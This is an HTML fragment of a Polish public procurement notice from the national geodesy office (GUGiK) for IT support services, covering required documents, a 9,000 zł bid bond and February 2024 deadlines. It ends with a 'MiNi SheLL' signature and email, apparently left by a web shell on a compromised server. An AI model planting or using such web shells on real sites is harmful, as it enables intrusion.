Pzp a także na podstawie art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r. poz. 1497). Wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, celem potwierdzenia, że na dzień składania ofert każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie Zamawiającego, Wykonawca którego oferta zostanie najwyżej oceniona, w terminie nie krótszym niż 5 dni od dnia wezwania, złoży następujące podmiotowe środki dowodowe, aktualne na dzień złożenia: <br/>a.	wykaz wykonanych usług, o których mowa w Sekcji V 5.4 ust. 1 pkt 4 lit. a, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wzór usług stanowi Załącznik nr 6 do SWZ;<br/>b.	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, o których mowa w Sekcji V 5.4 ust. 1 pkt 4 lit. b i c, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi Załącznik nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium w wysokości 9 000,00 zł (dziewięć tysięcy złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy NBP rachunek nr: 17 1010 1010 0007 5213 9120 0000 z dopiskiem <br/>„Wadium nr referencyjny: BDG-ZP.2610.6.2024.BDG”<br/>Uwaga: za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>Wadium wnoszone w pieniądzu jest wniesione skutecznie jeżeli zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. <br/>5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6.	W przypadku wnoszenia wadium w jednej z form wymienionych w ust. 3 pkt 2 - 4, dokument musi być sporządzony w języku polskim, a jego beneficjentem musi być Główny Urząd Geodezji i Kartografii z siedzibą w Warszawie, adres: ul. Żurawia 6/12, 00-926 Warszawa. <br/>7.	Złożone poręczenie lub gwarancja muszą zawierać bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze żądanie Zamawiającego, w przypadku zaistnienia okoliczności wymienionych art. 98 ust. 6 ustawy Pzp. <br/>8.	Z wyłączeniem gwarancji bankowych w formie komunikatu SWIFT, dokument potwierdzający wniesienie wadium w jednej z form wymienionych w ust. 3 pkt 2 - 4 musi być złożony wraz z ofertą w formie oryginału, w postaci elektronicznej. Zamawiający nie dopuszcza złożenia tego dokumentu w jakiejkolwiek innej formie, np. pisemnej. <br/>9.	Wadium wniesione w gwarancji bankowej w formie komunikatu SWIFT jest wniesione skutecznie jeżeli przed upływem terminu składania ofert komunikat SWIFT zostanie odebrany przez bank prowadzący rachunek bankowy Zamawiającego, o którym mowa w ust. 4. <br/>10.	Dowód wniesienia wadium w pieniądzu albo w gwarancji bankowej w formie komunikatu SWIFT Zamawiający zaleca załączyć do oferty. <br/>11.	Zwrot bądź zatrzymanie wadium nastąpi zgodnie z art. 98 ust. 1, 2 oraz 4 - 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:<br/>1) warunek określony w Sekcji V 5.4 ust. 1 pkt 4 lit. a winien spełniać samodzielnie przynajmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie;<br/>2) warunek określony w Sekcji V 5.4 ust. 1 pkt 4 lit. b zostanie spełniony, jeżeli Wykonawcy wspólnie ubiegający się o zamówienie będą go spełniać łącznie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy oraz wskazanym w § 11 wzoru umowy, stanowiącym Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Złożenie oferty wraz z załącznikami następuje przez Platformę dostępną pod adresem https://gugik.ezamawiajacy.pl poprzez polecenie „Złóż ofertę”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-14 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający ustanawia obowiązek osobistego wykonania przez Wykonawcę kluczowych zadań, o którym mowa odpowiednio w art. 60 i art. 121 ustawy polegających na świadczeniu bieżącego wsparcia dla użytkowników (pracujących w siedzibach Zamawiającego, jak również zdalnie) w zakresie systemów i infrastruktury wymienionych w ust. 2 pkt 1 lit. b, lit. f i lit. aa SOPZ, w szczególności dla systemów specyficznych dla administracji państwowej tj. Elektronicznego Zarządzania Dokumentacją (EZD), Systemu Trezor, systemów bankowości NBP i BGK, systemów finansowo-księgowych i kadrowo-płacowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com